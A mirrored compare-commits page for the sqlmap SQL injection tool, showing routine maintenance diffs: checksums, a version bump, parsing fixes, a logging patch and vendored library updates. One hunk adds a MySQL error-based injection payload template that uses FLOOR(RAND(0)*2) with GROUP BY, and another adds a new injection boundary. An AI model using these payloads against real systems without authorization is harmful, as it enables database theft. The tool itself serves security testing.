mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-08 05:31:32 +00:00
Compare commits
16 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
1d17e2a942 | ||
|
|
79aa315344 | ||
|
|
79f4cfb0a7 | ||
|
|
3192da0acd | ||
|
|
d37db2e7e8 | ||
|
|
f1ac7dc39b | ||
|
|
9a87f47777 | ||
|
|
a79ed52463 | ||
|
|
73a62f9f4e | ||
|
|
c1af880fb8 | ||
|
|
9a48a27593 | ||
|
|
6ae0d0f54e | ||
|
|
cf91046766 | ||
|
|
0b9a8c57d7 | ||
|
|
b256269883 | ||
|
|
ebfafe93e1 |
@@ -75,10 +75,10 @@ c6be099a5dee34f3a7570715428add2e7419f4e73a7ce9913d3fb76eea78d88e data/udf/postg
|
||||
a7eb4d1bcbdfd155383dcd35396e2d9dd40c2e89ce9d5a02e63a95a94f0ab4ea data/xml/banner/sharepoint.xml
|
||||
e2febc92f9686eacf17a0054f175917b783cc6638ca570435a5203b03245fc18 data/xml/banner/x-aspnet-version.xml
|
||||
75672f8faa8053af0df566a48700f2178075f67c593d916313fcff3474da6f82 data/xml/banner/x-powered-by.xml
|
||||
3f9d2b3c929cacd96394d190860adc0997c9c7665020073befc69f65e5deb393 data/xml/boundaries.xml
|
||||
1ac399c49ce3cb8c0812bb246e60c8a6718226efe89ccd1f027f49a18dbeb634 data/xml/boundaries.xml
|
||||
130eef6c02dc5749f164660aa4210f75b0de35aaf2afef94b329bb1e033851f7 data/xml/errors.xml
|
||||
cfa1f0557fb71be0631796a4848d17be536e38f94571cf6ef911454fbc6b30d1 data/xml/payloads/boolean_blind.xml
|
||||
c22d076af9e8518f3b44496aee651932edf590ea4be0b328262314fcb4a52da8 data/xml/payloads/error_based.xml
|
||||
f2b711ea18f20239ba9902732631684b61106d4a4271669125a4cf41401b3eaf data/xml/payloads/error_based.xml
|
||||
b0f434f64105bd61ab0f6867b3f681b97fa02b4fb809ac538db382d031f0e609 data/xml/payloads/inline_query.xml
|
||||
0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689 data/xml/payloads/stacked_queries.xml
|
||||
997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1 data/xml/payloads/time_blind.xml
|
||||
@@ -165,7 +165,7 @@ f9c96cd3fe99578bed9d49a8bdf8d76836d320a7c48c56eb0469f48b36775c35 lib/controller
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 lib/controller/__init__.py
|
||||
826c33f1105be4c0985e1bbe1d75bdb009c17815ad6552fc8d9bf39090d3c40f lib/core/agent.py
|
||||
b2d69c99632da5c2acd0c0934e70d55862f1380a3f602cbe7456d617fb9c1fc9 lib/core/bigarray.py
|
||||
fb40e269d4ef74653bb42897f3da00462a843e5623b30bc1169cd9b83946208c lib/core/common.py
|
||||
f43931f5dbabd11de96267b6f9431025ee2e09e65a14b907c360ce029bbed39f lib/core/common.py
|
||||
5c26b0f308266bc3a9679ef837439e38d1dc7a69eac6bd3422280f49aaf114d2 lib/core/compat.py
|
||||
b60c96780cad4a257f91a0611b08cfcc52f242908c5d5ab2bf9034ef07869602 lib/core/convert.py
|
||||
5e381515873e71c395c77df00bf1dd8c4592afc6210a2f75cbc20daf384e539f lib/core/data.py
|
||||
@@ -180,14 +180,14 @@ e8f6f1df8814b7b03c3eba22901837555083f66c99ee93b943911de785736bfa lib/core/dicts
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 lib/core/__init__.py
|
||||
fce3fd4b161ec1c6e9d5bf1dca5bc4083e07d616ed2c14b798e96b60ec67c2b2 lib/core/log.py
|
||||
4caebf27d203673b8ad32394937397319f606c4e1f1e1a2a221402d39c644b40 lib/core/optiondict.py
|
||||
33e0ec9ed38ae1ac74f1e2e3a1a246dee44c167723c9df69635793bfdbd971df lib/core/option.py
|
||||
a6f059ed73855c527472758b611e6355f92d6c431a84c069eb52dfcd4bfdc882 lib/core/patch.py
|
||||
b3d2be01406c3bae1cf46e1b8c0f773264b61a037e6a92e5c0ba190a82afc869 lib/core/option.py
|
||||
d2d81ee7520b55571923461a2bdfaa68dda74a89846761338408ab0acf08d3a5 lib/core/patch.py
|
||||
bf77f9fc4296f239687297aee1fd6113b34f855965a6f690b52e26bd348cb353 lib/core/profiling.py
|
||||
4ccce0d53f467166d4084c9ef53a07f54cc352e75f785454a31c8a820511a84e lib/core/readlineng.py
|
||||
4eff81c639a72b261c8ba1c876a01246e718e6626e8e77ae9cc6298b20a39355 lib/core/replication.py
|
||||
bbd1dcda835934728efc6d68686e9b0da72b09b3ee38f3c0ab78e8c18b0ba726 lib/core/revision.py
|
||||
eed6b0a21b3e69c5583133346b0639dc89937bd588887968ee85f8389d7c3c96 lib/core/session.py
|
||||
c34e1e3058999c8bc709341c63d669d2f804df06404a6bec1b01520f64418dff lib/core/settings.py
|
||||
980d7080a21fbf690f65885e6916be0dcef8e1ba3c1a955a52a00e426eb0e590 lib/core/settings.py
|
||||
2bec97d8a950f7b884e31dfe9410467f00d24f21b35672b95f8d68ed59685fd4 lib/core/shell.py
|
||||
e90a359b37a55c446c60e70ccd533f87276714d0b09e34f69b0740fd729ddbf8 lib/core/subprocessng.py
|
||||
54f7c70b4c7a9931f7ff3c1c12030180bde38e35a306d5e343ad6052919974cd lib/core/target.py
|
||||
@@ -207,15 +207,15 @@ b48edf3f30db127b18419f607894d5de46fc949d14c65fdc85ece524207d6dfd lib/parse/html
|
||||
8743332261f8b0da52c94ca56510f0f2e856431c2bbe2164efdd3de605c2802b lib/parse/payloads.py
|
||||
23adb7169e99554708062ff87ae795b90c6a284d1b5159eada974bf9f8d7583f lib/parse/sitemap.py
|
||||
0acfa7da4b0dbc81652b018c3fdbb42512c8d7d5f01bbf9aef18e5ea7d38107a lib/request/basicauthhandler.py
|
||||
c8446d4a50f06a50d7db18adc04c321e12cd2d0fa8b04bd58306511c89823316 lib/request/basic.py
|
||||
2395d6d28d6a1e342fccd56bb741080468a777b9b2a5ddd5634df65fe9785cef lib/request/basic.py
|
||||
ead55e936dfc8941e512c8e8a4f644689387f331f4eed97854c558be3e227a91 lib/request/chunkedhandler.py
|
||||
06128c4e3e0e1fe34618de9d1fd5ee21292953dce4a3416567e200d2dfda79f2 lib/request/comparison.py
|
||||
45f365239c48f2f6b8adc605b2f33b3522bda6e3248589dae909380434aaa0ad lib/request/connect.py
|
||||
470e96857a7037a2d74b2c4b1c8c5d8379b76ea8cbdb1d8dd4367a7a852fa93c lib/request/direct.py
|
||||
e802cc9099282764da0280172623600b6b9bb9fe1c87f352ade8be7a3f622585 lib/request/dns.py
|
||||
226226c2b8c906e0d0612ea68404c7f266e7a6685e0bf233e5456e10625b012d lib/request/httpshandler.py
|
||||
9922275d3ca79f00f9b9301f4e4d9f1c444dc7ac38de6d50ef253122abae4833 lib/request/httpshandler.py
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 lib/request/__init__.py
|
||||
6944e07e5c061afea30494bcea5198c67b86dda1f291b80e75cb1f121490f1a7 lib/request/inject.py
|
||||
ea8261a5099ca66032ae7606e5392de719827a71750c203e3fc6bb6759757cf3 lib/request/inject.py
|
||||
ba87a7bc91c1ec99a273284b9d0363358339aab0220651ff1ceddf3737ce2436 lib/request/methodrequest.py
|
||||
4ba939b6b9a130cd185e749c585afa2c4c8a5dbcbf8216ecc4f3199fe001b3e2 lib/request/pkihandler.py
|
||||
c6b222c0d34313cdea82fb39c8ead5d658400bf41e56aabd9640bdcf9bedc3a1 lib/request/rangehandler.py
|
||||
@@ -398,7 +398,7 @@ fdc3effe9320197795137dedb58e46c0409f19649889177443a2cbf58787c0dd plugins/dbms/m
|
||||
7f0165c085b0cb7d168d86acb790741c7ba12ad01ca9edf7972cfb184adb3ee9 plugins/dbms/mysql/connector.py
|
||||
05c4624b2729f13af2dd19286fc9276fc97c0f1ff19a31255785b7581fc232ae plugins/dbms/mysql/enumeration.py
|
||||
9915fd436ea1783724b4fe12ea1d68fc3b838c37684a2c6dd01d53c739a1633f plugins/dbms/mysql/filesystem.py
|
||||
bb5e22e286408100bcc0bd2d5f9d894ea0927c9300fa1635f4f6253590305b54 plugins/dbms/mysql/fingerprint.py
|
||||
6114337620d824bf061abee8bcfe6e52aea38a54ee437f1cfff92a9a2097c6a7 plugins/dbms/mysql/fingerprint.py
|
||||
ae824d447c1a59d055367aa9180acb42f7bb10df0006d4f99eeb12e43af563ae plugins/dbms/mysql/__init__.py
|
||||
60fc1c647e31df191af2edfd26f99bf739fec53d3a8e1beb3bffdcf335c781fe plugins/dbms/mysql/syntax.py
|
||||
784c31c2c0e19feb88bf5d21bfc7ae4bf04291922e40830da677577c5d5b4598 plugins/dbms/mysql/takeover.py
|
||||
@@ -460,8 +460,8 @@ acc41465f146d2611fca5a84bd8896bc0ccd2b032b8938357aea3e5b173a5a10 plugins/dbms/v
|
||||
7ac6006e0fc6da229c37fbce39a1406022e5fcc4cac5209814fa20818b8c031a plugins/dbms/virtuoso/takeover.py
|
||||
e6dfaab13d9f98ccffdc70dd46800ca2d61519731d10a267bc82f9fb82cd504d plugins/generic/connector.py
|
||||
664be8bb4157452f2e40c4f98a359e26b559d7ef4f4148564cb8533b5ebf7d54 plugins/generic/custom.py
|
||||
22b85d8b07a5f00a9a0d61093b96accd3c5a3daf50701366feef1b5b58d4042e plugins/generic/databases.py
|
||||
37e83713dbd6564deadb7fe68478129d411de93eaf5c5e0276124248e9373025 plugins/generic/entries.py
|
||||
8f4cd6fc48882869203eaa797fea339a5afaf17306a674b384ae18d47839a150 plugins/generic/databases.py
|
||||
f8fc1af049d08e7ff87899cad7766f376cc6dfe45baafb86ef13e7252b833e00 plugins/generic/entries.py
|
||||
a734d74599761cd1cf7d49c88deeb121ea57d80c2f0447e361a4e3a737154c0e plugins/generic/enumeration.py
|
||||
1c2e812096015eaef55be45d3a0bcd92b4db27eace47e36577aeff7b4246ad35 plugins/generic/filesystem.py
|
||||
05f33c9ba3897e8d75c8cf4be90eb24b08e1d7cd0fc0f74913f052c83bc1a7c1 plugins/generic/fingerprint.py
|
||||
@@ -476,7 +476,7 @@ d5b3243c2b048aa8074d2d828f74fbf8237286c3d00fd868f1b4090c267b78ef README.md
|
||||
78aafd53980096364f0c995c6283931bff505aed88fed1e7906fb06ee60e9c5b sqlmapapi.py
|
||||
168309215af7dd5b0b71070e1770e72f1cbb29a3d8025143fb8aa0b88cd56b62 sqlmapapi.yaml
|
||||
5e172e315524845fe091aa0b7b29303c92ac8f67594c6d50f026d627e415b7ed sqlmap.conf
|
||||
7800faa964d1fc06bbca856ca35bf21d68f5e044ae0bd5d7dea16d625d585adb sqlmap.py
|
||||
3a18b78b1aaf7236a35169db20eb21ca7d7fb907cd38dd34650f1da81c010cd6 sqlmap.py
|
||||
adda508966db26c30b11390d6483c1fa25b092942a29730e739e1e50c403a21f tamper/0eunion.py
|
||||
d38fe5ab97b401810612eae049325aa990c55143504b25cc9924810917511dee tamper/apostrophemask.py
|
||||
8de713d1534d8cda171db4ceeb9f4324bcc030bbef21ffeaf60396c6bece31e4 tamper/apostrophenullencode.py
|
||||
@@ -549,9 +549,9 @@ b4b03668061ba1a1dfc2e3a3db8ba500481da23f22b2bb1ebcbddada7479c3b0 tamper/upperca
|
||||
bd0fd06e24c3e05aecaccf5ba4c17d181e6cd35eee82c0efd6df5414fb0cb6f6 tamper/xforwardedfor.py
|
||||
55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py
|
||||
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py
|
||||
e8f0ea4d982ef93c8c59c7165a1f39ccccddcb24b9fec1c2d2aa5bdb2373fdd5 thirdparty/beautifulsoup/beautifulsoup.py
|
||||
dfb8a36f58a3ae72c34d6a350830857c88ff8938fe256af585d5c9c63040c5b2 thirdparty/beautifulsoup/beautifulsoup.py
|
||||
7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63 thirdparty/beautifulsoup/__init__.py
|
||||
1b0f89e4713cc8cec4e4d824368a4eb9d3bdce7ddfc712326caac4feda1d7f69 thirdparty/bottle/bottle.py
|
||||
0915f7e3d0025f81a2883cd958813470a4be661744d7fffa46848b45506b951a thirdparty/bottle/bottle.py
|
||||
9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2 thirdparty/bottle/__init__.py
|
||||
0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff thirdparty/chardet/big5freq.py
|
||||
901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773 thirdparty/chardet/big5prober.py
|
||||
@@ -622,7 +622,7 @@ d1d54fc08f80148a4e2ac5eee84c8475617e8c18bfbde0dfe6894c0f868e4659 thirdparty/pyd
|
||||
1c61d71502a80f642ff34726aa287ac40c1edd8f9239ce2e094f6fded00d00d4 thirdparty/six/__init__.py
|
||||
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/socks/__init__.py
|
||||
7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9 thirdparty/socks/LICENSE
|
||||
5ac11e932896dfb7d50353dd16f717bd98cb1fb235f28e6fe8880c03655838bb thirdparty/socks/socks.py
|
||||
543217f63a4f0a7e7b4f9063058d2173099d54d010a6a4432e15a97f76456520 thirdparty/socks/socks.py
|
||||
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/termcolor/__init__.py
|
||||
b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df thirdparty/termcolor/termcolor.py
|
||||
4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc thirdparty/wininetpton/__init__.py
|
||||
|
||||
@@ -554,6 +554,15 @@ Formats:
|
||||
</boundary>
|
||||
<!-- End of escaped column name boundaries -->
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>7</clause>
|
||||
<where>1</where>
|
||||
<ptype>3</ptype>
|
||||
<prefix> [RANDSTR1],</prefix>
|
||||
<suffix> [RANDSTR2]</suffix>
|
||||
</boundary>
|
||||
|
||||
<!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
|
||||
@@ -221,6 +221,26 @@
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>7</clause>
|
||||
<where>1</where>
|
||||
<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
|
||||
<request>
|
||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
|
||||
@@ -136,6 +136,7 @@ from lib.core.settings import HTTP_CHUNKED_SPLIT_KEYWORDS
|
||||
from lib.core.settings import IGNORE_PARAMETERS
|
||||
from lib.core.settings import IGNORE_SAVE_OPTIONS
|
||||
from lib.core.settings import INFERENCE_UNKNOWN_CHAR
|
||||
from lib.core.settings import INJECT_HERE_REGEX
|
||||
from lib.core.settings import IP_ADDRESS_REGEX
|
||||
from lib.core.settings import ISSUES_PAGE
|
||||
from lib.core.settings import IS_TTY
|
||||
@@ -4647,7 +4648,7 @@ def isAdminFromPrivileges(privileges):
|
||||
|
||||
return retVal
|
||||
|
||||
def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
def findPageForms(content, url, raiseException=False, addToTargets=False):
|
||||
"""
|
||||
Parses given page content for possible forms (Note: still not implemented for Python3)
|
||||
|
||||
@@ -4665,7 +4666,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
|
||||
if not content:
|
||||
errMsg = "can't parse forms as the page content appears to be blank"
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -4687,7 +4688,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
forms = ParseResponse(filtered, backwards_compat=False)
|
||||
except:
|
||||
errMsg = "no success"
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -4714,7 +4715,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
except (ValueError, TypeError) as ex:
|
||||
errMsg = "there has been a problem while "
|
||||
errMsg += "processing page forms ('%s')" % getSafeExString(ex)
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -4766,7 +4767,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
|
||||
if not retVal and not conf.crawlDepth:
|
||||
errMsg = "there were no forms found at the given target URL"
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -5275,6 +5276,9 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
Parses WebScarab logs (POST method not supported)
|
||||
"""
|
||||
|
||||
if WEBSCARAB_SPLITTER not in content:
|
||||
return
|
||||
|
||||
reqResList = content.split(WEBSCARAB_SPLITTER)
|
||||
|
||||
for request in reqResList:
|
||||
@@ -5358,6 +5362,8 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
if not line.strip() and index == len(lines) - 1:
|
||||
break
|
||||
|
||||
line = re.sub(INJECT_HERE_REGEX, CUSTOM_INJECTION_MARK_CHAR, line)
|
||||
|
||||
newline = "\r\n" if line.endswith('\r') else '\n'
|
||||
line = line.strip('\r')
|
||||
match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None
|
||||
@@ -5402,9 +5408,9 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
|
||||
port = extractRegexResult(r":(?P<result>\d+)\Z", value)
|
||||
if port:
|
||||
value = value[:-(1 + len(port))]
|
||||
|
||||
host = value
|
||||
host = value[:-(1 + len(port))]
|
||||
else:
|
||||
host = value
|
||||
|
||||
# Avoid to add a static content length header to
|
||||
# headers and consider the following lines as
|
||||
@@ -5601,8 +5607,7 @@ def checkSums():
|
||||
with open(filepath, "rb") as f:
|
||||
content = f.read()
|
||||
if not hashlib.sha256(content).hexdigest() == expected:
|
||||
print(entry)
|
||||
retVal &= False
|
||||
# break
|
||||
break
|
||||
|
||||
return retVal
|
||||
|
||||
@@ -1360,7 +1360,7 @@ def _setHTTPAuthentication():
|
||||
errMsg += "be in format 'DOMAIN\\username:password'"
|
||||
elif authType == AUTH_TYPE.PKI:
|
||||
errMsg = "HTTP PKI authentication require "
|
||||
errMsg += "usage of option `--auth-pki`"
|
||||
errMsg += "usage of option `--auth-file`"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
aCredRegExp = re.search(regExp, conf.authCred)
|
||||
|
||||
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
|
||||
import codecs
|
||||
import collections
|
||||
import inspect
|
||||
import logging
|
||||
import os
|
||||
import random
|
||||
import re
|
||||
@@ -135,6 +136,21 @@ def dirtyPatches():
|
||||
|
||||
codecs.register_error("reversible", _reversible)
|
||||
|
||||
# Reference: https://github.com/sqlmapproject/sqlmap/issues/5731
|
||||
if not hasattr(logging, "_acquireLock"):
|
||||
def _acquireLock():
|
||||
if logging._lock:
|
||||
logging._lock.acquire()
|
||||
|
||||
logging._acquireLock = _acquireLock
|
||||
|
||||
if not hasattr(logging, "_releaseLock"):
|
||||
def _releaseLock():
|
||||
if logging._lock:
|
||||
logging._lock.release()
|
||||
|
||||
logging._releaseLock = _releaseLock
|
||||
|
||||
def resolveCrossReferences():
|
||||
"""
|
||||
Place for cross-reference resolution
|
||||
|
||||
@@ -19,7 +19,7 @@ from lib.core.enums import OS
|
||||
from thirdparty import six
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.8.6.3"
|
||||
VERSION = "1.8.7.0"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
@@ -442,7 +442,7 @@ COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "
|
||||
WEBSCARAB_SPLITTER = "### Conversation"
|
||||
|
||||
# Splitter used between requests in BURP log files
|
||||
BURP_REQUEST_REGEX = r"={10,}\s+([A-Z]{3,} .+?)\s+={10,}"
|
||||
BURP_REQUEST_REGEX = r"={10,}\s+([A-Z]{3,} .+?)\s+(={10,}|\Z)"
|
||||
|
||||
# Regex used for parsing XML Burp saved history items
|
||||
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.*?<request base64="true"><!\[CDATA\[([^]]+)'
|
||||
|
||||
@@ -282,15 +282,8 @@ def decodePage(page, contentEncoding, contentType, percentDecode=True):
|
||||
if not page or (conf.nullConnection and len(page) < 2):
|
||||
return getUnicode(page)
|
||||
|
||||
if hasattr(contentEncoding, "lower"):
|
||||
contentEncoding = contentEncoding.lower()
|
||||
else:
|
||||
contentEncoding = ""
|
||||
|
||||
if hasattr(contentType, "lower"):
|
||||
contentType = contentType.lower()
|
||||
else:
|
||||
contentType = ""
|
||||
contentEncoding = contentEncoding.lower() if hasattr(contentEncoding, "lower") else ""
|
||||
contentType = contentType.lower() if hasattr(contentType, "lower") else ""
|
||||
|
||||
if contentEncoding in ("gzip", "x-gzip", "deflate"):
|
||||
if not kb.pageCompress:
|
||||
@@ -382,7 +375,6 @@ def decodePage(page, contentEncoding, contentType, percentDecode=True):
|
||||
|
||||
def processResponse(page, responseHeaders, code=None, status=None):
|
||||
kb.processResponseCounter += 1
|
||||
|
||||
page = page or ""
|
||||
|
||||
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None, status)
|
||||
|
||||
@@ -80,7 +80,7 @@ class HTTPSConnection(_http_client.HTTPSConnection):
|
||||
# Reference(s): https://askubuntu.com/a/1263098
|
||||
# https://askubuntu.com/a/1250807
|
||||
_contexts[protocol].set_ciphers("DEFAULT@SECLEVEL=1")
|
||||
except ssl.SSLError:
|
||||
except (ssl.SSLError, AttributeError):
|
||||
pass
|
||||
result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host if re.search(r"\A[\d.]+\Z", self.host or "") is None else None)
|
||||
if result:
|
||||
|
||||
@@ -204,7 +204,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
|
||||
if limitCond:
|
||||
test = True
|
||||
|
||||
if not stopLimit or stopLimit <= 1:
|
||||
if stopLimit is None or stopLimit <= 1:
|
||||
if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]):
|
||||
test = False
|
||||
|
||||
|
||||
@@ -45,9 +45,10 @@ class Fingerprint(GenericFingerprint):
|
||||
# Reference: https://dev.mysql.com/doc/relnotes/mysql/<major>.<minor>/en/
|
||||
|
||||
versions = (
|
||||
(80300, 80302), # MySQL 8.3
|
||||
(80200, 80202), # MySQL 8.2
|
||||
(80100, 80102), # MySQL 8.1
|
||||
(80000, 80036), # MySQL 8.0
|
||||
(80000, 80037), # MySQL 8.0
|
||||
(60000, 60014), # MySQL 6.0
|
||||
(50700, 50745), # MySQL 5.7
|
||||
(50600, 50652), # MySQL 5.6
|
||||
|
||||
@@ -325,7 +325,7 @@ class Databases(object):
|
||||
|
||||
if not isNoneValue(table):
|
||||
db = safeSQLIdentificatorNaming(db)
|
||||
table = safeSQLIdentificatorNaming(table, True)
|
||||
table = safeSQLIdentificatorNaming(table, True).strip()
|
||||
|
||||
if conf.getComments:
|
||||
_ = queries[Backend.getIdentifiedDbms()].table_comment
|
||||
|
||||
@@ -134,12 +134,14 @@ class Entries(object):
|
||||
kb.dumpTable = "%s:%s" % (conf.db, tbl)
|
||||
elif Backend.isDbms(DBMS.SQLITE):
|
||||
kb.dumpTable = tbl
|
||||
elif METADB_SUFFIX.upper() in conf.db.upper():
|
||||
kb.dumpTable = tbl
|
||||
else:
|
||||
kb.dumpTable = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
|
||||
warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
if METADB_SUFFIX not in conf.db:
|
||||
if METADB_SUFFIX.upper() not in conf.db.upper():
|
||||
warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
warnMsg += ", skipping" if len(tblList) > 1 else ""
|
||||
logger.warning(warnMsg)
|
||||
@@ -154,7 +156,7 @@ class Entries(object):
|
||||
|
||||
if not colList:
|
||||
warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
if METADB_SUFFIX not in conf.db:
|
||||
if METADB_SUFFIX.upper() not in conf.db.upper():
|
||||
warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
warnMsg += " (no usable column names)"
|
||||
logger.warning(warnMsg)
|
||||
@@ -168,7 +170,7 @@ class Entries(object):
|
||||
if conf.col:
|
||||
infoMsg += " of column(s) '%s'" % colNames
|
||||
infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
||||
if METADB_SUFFIX not in conf.db:
|
||||
if METADB_SUFFIX.upper() not in conf.db.upper():
|
||||
infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
logger.info(infoMsg)
|
||||
|
||||
|
||||
@@ -437,7 +437,7 @@ def main():
|
||||
raise SystemExit
|
||||
|
||||
elif any(_ in errMsg for _ in (": 9.9.9#",)):
|
||||
errMsg = "LOL :)"
|
||||
errMsg = "LOL xD"
|
||||
logger.critical(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
|
||||
8
thirdparty/beautifulsoup/beautifulsoup.py
vendored
8
thirdparty/beautifulsoup/beautifulsoup.py
vendored
@@ -80,7 +80,7 @@ from __future__ import generators
|
||||
from __future__ import print_function
|
||||
|
||||
__author__ = "Leonard Richardson (leonardr@segfault.org)"
|
||||
__version__ = "3.2.1"
|
||||
__version__ = "3.2.1b"
|
||||
__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson"
|
||||
__license__ = "New-style BSD"
|
||||
|
||||
@@ -93,14 +93,16 @@ if sys.version_info >= (3, 0):
|
||||
text_type = str
|
||||
binary_type = bytes
|
||||
basestring = str
|
||||
unichr = chr
|
||||
else:
|
||||
text_type = unicode
|
||||
binary_type = str
|
||||
|
||||
try:
|
||||
from htmlentitydefs import name2codepoint
|
||||
from html.entities import name2codepoint
|
||||
except ImportError:
|
||||
name2codepoint = {}
|
||||
from htmlentitydefs import name2codepoint
|
||||
|
||||
try:
|
||||
set
|
||||
except NameError:
|
||||
|
||||
424
thirdparty/bottle/bottle.py
vendored
424
thirdparty/bottle/bottle.py
vendored
@@ -69,7 +69,7 @@ if __name__ == '__main__':
|
||||
# Imports and Python 2/3 unification ##########################################
|
||||
###############################################################################
|
||||
|
||||
import base64, calendar, cgi, email.utils, functools, hmac, itertools,\
|
||||
import base64, calendar, email.utils, functools, hmac, itertools,\
|
||||
mimetypes, os, re, tempfile, threading, time, warnings, weakref, hashlib
|
||||
|
||||
from types import FunctionType
|
||||
@@ -94,6 +94,7 @@ if py3k:
|
||||
from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote
|
||||
urlunquote = functools.partial(urlunquote, encoding='latin1')
|
||||
from http.cookies import SimpleCookie, Morsel, CookieError
|
||||
from collections import defaultdict
|
||||
from collections.abc import MutableMapping as DictMixin
|
||||
from types import ModuleType as new_module
|
||||
import pickle
|
||||
@@ -126,7 +127,7 @@ else: # 2.x
|
||||
from imp import new_module
|
||||
from StringIO import StringIO as BytesIO
|
||||
import ConfigParser as configparser
|
||||
